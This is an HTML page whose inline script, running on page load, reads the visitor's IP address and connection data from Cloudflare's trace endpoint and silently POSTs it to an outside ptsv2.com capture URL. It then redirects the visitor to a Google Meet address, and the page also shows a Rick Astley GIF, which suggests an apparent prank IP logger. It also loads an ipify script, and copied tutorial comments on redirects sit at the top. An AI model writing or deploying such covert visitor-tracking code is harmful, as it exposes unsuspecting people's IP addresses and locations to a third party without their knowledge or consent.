

<head>

<script type="application/javascript">

// Current URL: https://my-website.com/page_a
const nextURL = 'https://my-website.com/page_b';

// This will create a new entry in the browser's history, reloading afterwards
window.location.href = nextURL;

// This will replace the current entry in the browser's history, reloading afterwards
window.location.assign(nextURL);

// This will replace the current entry in the browser's history, reloading afterwards
window.location.replace(nextURL);

function text(url) {
  return fetch(url).then(res => res.text());
}


function lel(){



text('https://www.cloudflare.com/cdn-cgi/trace').then(data => {
  let ipRegex = /[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/
  let ip = data;
  console.log(ip);
const params = {
    param1: ip
};
const options = {
    method: 'POST',
    body: JSON.stringify( params )  
};

fetch( 'https://ptsv2.com/t/bcowq-1616701625/post', options )
    .then( response => response.json() )
    .then( response => {
        // Do something with response.
    } );
});


}
lel();

window.location.href="https://meet.google.com/lookup/002";





</script>

<script type="application/javascript" src="https://api.ipify.org?format=jsonp&callback=getIP"></script>

</head>

<body>
  <img src="http://img2.wikia.nocookie.net/__cb20130616193417/dragonball/images/f/f3/Rick_astley.gif"/>
</body>
